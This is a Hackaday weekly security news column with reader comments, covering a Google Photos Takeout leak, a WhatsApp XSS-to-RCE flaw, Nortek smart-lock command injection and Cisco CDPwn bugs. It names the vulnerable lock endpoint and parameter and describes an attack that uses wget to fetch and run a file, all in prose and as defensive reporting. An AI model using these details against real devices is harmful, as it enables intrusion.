This Week In Security: Google Photos, Whatsapp, And Doom On Deskphones

Google Photos is handy. You take pictures and videos on your cell phone, and they automatically upload to the cloud. If you’re anything like me, however, every snap comes with a self-reminder that “the cloud” is a fancy name for someone else’s server. What could possibly go wrong? How about some of your videos randomly included in another user’s downloads?

Confirmed by Google themselves, this bug hit those using Google Takeout, the service that allows you to download all your data from a Google application, as a single archive. Google Photos archives downloaded between November 21 and November 25 may contain videos from other users, according to a notice sent to the users who downloaded said archives. It’s notable that those notices haven’t been sent to users who’s videos were exposed.

Whatsapp

Whatsapp has been in the news for a couple reasons in the last few days. I’ll leave it to you to decide if the stories are related. First, Jeff Bezos seems to have had some of his accounts or devices compromised by Saudi agents. The popular theory is that a video sent over Whatsapp contained an exploit, which when downloaded on Bezos’ iPhone, resulted in a persistent compromise. This theory seems to be supported by an analysis by FTI.

Reading through the report is… underwhelming. The video they suspect to have been the compromise vector wasn’t ever successfully decrypted. No actual Indicators of Compromise were found, and no maliciously changed systems files were identified. The closest thing to a smoking gun found in the report is the vast amounts of outgoing data observed after the potential compromise. There are questions about the usefulness of that metric, and Robert Graham does a good job debunking the report.

Whatsapp *has* had several high profile vulnerabilities that could have been used to pull off an attack like this. Which brings us to the topic of vulnerabilities in Whatsapp, so here’s one in the desktop app.

[Gal Weizman] discovered a weird Whatsapp problem in 2017. When using the web interface, and sending a message that quoted a previous message, it was possible to manipulate the message being quoted, putting words in someone’s mouth. He found it amusing, but eventually came back to take a more serious look at what he’s found. He discovered that he could also hijack the link preview banner, giving him a cross site scripting attack. That would be a serious enough vulnerability in itself, but not content with XSS, [Gal] took things one step further.

Whatsapp offers a native desktop app, using the Electron framework. Electron essentially lets you package a web app in native form. Under the hood, it’s simply a browser bundled with the web-based code. A consequence of Electron is that a XSS vulnerability will likely work in an Electron app as well. This was no exception, and since Whatsapp was shipping their app with an ancient version of Electron, an old Chrome vulnerability was still present, resulting in a viable RCE that escapes the Electron app.

Whatsapp has released updates that address these issues, so if you have desktop Whatsapp installed, go make sure it’s up to date!

I got Phished

You’re familiar with haveibeenpwned.com. Have you ever thought to yourself, if only there was a service that alerted me when one of my domains showed up in phishing attack…. I Got Phished is the service for you. It’s intended for a company’s security team to sign up with the company domains. When an email address from one of those domains shows up in a phishing database, the team gets an email alerting them.

All it takes to sign up is the abuse@, postmaster@, noc@, or security@ email address for the domain you want to monitor. So gmail users, you’re out of luck. If you run your own domain, then maybe it’s worth signing up for the service.

Cisco Security DOOMed by CDPwn

A series of smart locks made by Nortek Security & Control has a vulnerability that is now being actively exploited. A PHP endpoint on those devices failed to sanitize inputs properly, runs as root, and can be used to run arbitrary commands. “card_scan+decoder.php” is accessible over http, and anything in the “door” parameter is executed as root. The active attack uses wget to grab a file from a remote server and run that file.

To exploit this flaw remotely, the endpoint has to be accessible, which means that only devices with a public IP addresses are vulnerable so far. The limited IPv4 address space and widespread usage of NAT has once again blunted the impact of a really serious vulnerability. It will be interesting to watch what happens with the growing popularity of IPv6, as more and less secure devices get their own IP addresses.

Doom on a Desk Phone

Researchers at Armis have published their research into Cisco hardware under the name CDPwn, inspired by Cisco’s CDP (Cisco Discovery Protocol). The interesting details are available in their whitepaper, but before we get to that, take a moment to watch the video embedded below, as it combines a couple of our favorite things here at Hackaday: security vulnerabilities, and running Doom on unexpected hardware.

Cisco manufacturers hundreds of different devices, and one of their selling points is interoperability. You plug a Cisco phone into a Cisco switch, and they do some autoconfiguration magic, setting up proper VLANs, etc. Many of these features depend on proprietary Cisco protocols, and one of the most important is CDP. This layer-2 protocol allows devices to communicate with each other, regardless of what VLAN they’re set to. After looking at previously discovered CDP flaws, the guys at Armis got to work. Their first discovery was a Denial of Service attack. A packet informing a neighboring device about addresses lacked a reasonable upper bound on the number of addresses described. An incoming packet could claim to be describing three billion addresses, and the target device would simply crash trying to allocate enough memory to handle the packet.

One surprising discovery is that the CDP implementation seems to be built from scratch for different Cisco product lines. While this means that a single vulnerability can’t be leveraged across every device, it does suggest that more vulnerabilities will exist overall, and will take longer to fix. In VoIP phones, for example, the PortID TLV (Type-LengthValue) is copied into a static buffer without proper length checks. It’s a trivial buffer overflow, easily leading to exploitation.

Cisco has firmware updates available for the affected devices. These aren’t particularly sophisticated attacks. It appears once again, that a reputable brand name doesn’t guarantee quality code running under the hood.

12 thoughts on “This Week In Security: Google Photos, Whatsapp, And Doom On Deskphones

  1. Once again Electron proves that a web browser shouldn’t be used as a replacement for native applications if security is even slightly important.
    Too bad the whole premise of Electron is the illusion that low-paid & low-skilled web developers can now also be programmers.

    1. Have you tried any of the new web frontend technologies? AngularJS, Angular 2, Vue.js, React, Bootstrap, cssgrid? They make UI design not suck. Data binding is awesome and was picked up for Flutter, Android’s new UI library (Android is the worst thing I’ve ever developed for so this is a welcome change). I understand exactly why somebody wants web dev on desktop.

      1. and yet you have proven his point exactly. I also understand why someone wants web dev on the desktop but i also understand why they shouldnt have it when security is important. All of those “technologies” that you have mentioned add on extra layers into the program and thus have created a larger attack surface for malicious people to take advantage of. Its simple things like failing to check input length that leads to a buffer overflow which makes secure applications not secure at all.

        There is a difference between UI and back end programming and the same tools should not be used for both, while the frameworks you mentioned might be great for creating dazzeling user interface, they are not audited for security. Thus if security is important in an application then electron should not be used as a replacement for native application programming.

  2. Under GDPR, don’t Google have to disclose the the info to users who’s photos have been shared without their consent? I think there’s a timeline notifications too. 4% of annual turnover as a fine? Somehow I don’t see that happening.

  3. And this is why I don’t trust the cloud. Storage is quite cheap nowadays, with the cost of flash drives reasonable enough
    that you shouldn’t need to depend on a cloud service. Once you upload your data to the cloud, it isn’t your data anymore.
    It sits on a server somewhere, and you don’t know where that server is, who has access to it, or what security it has.
    So, would you upload your tax returns to the cloud? Your banking information? Of course not, yet people freely upload
    pictures of their kids etc. A simple search on someone’s name can not only pull up their current address, email, and
    phone numbers, but previous addresses, emails, and phone numbers as well. Privacy these days is an illusion.
    With all the data breaches that have happened over the last few years, and the people who work hard to steal what you
    have, (identity theft etc.) it makes you wonder how many data breaches we haven’t heard of.
    So, in my opinion, there is no security in the cloud. As I said, once you send your data there, it isn’t yours anymore.
    When stores ask for my phone number, I tell them to use the store’s number. Oh, but you can save money and get
    rewards if you sign up. Yes, and the marketing companies can track what I buy. No thank you.
    I know I sound paranoid, but everyone should be. There are people out there who don’t want to do an honest day’s work,
    yet they will work as hard as they can to steal anything they can use that will make themselves money.
    Think about it. Why is this data being collected? Who has access to it? What purpose will it be used for?
    Data is the digital equivalent of gold, and like gold, people will do anything to get it.

  4. Doom would be the best thing about a deskphone…. god i hate those. I have nightmares about all the people that nag me. I disconnected mine. People are so damn needy.

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.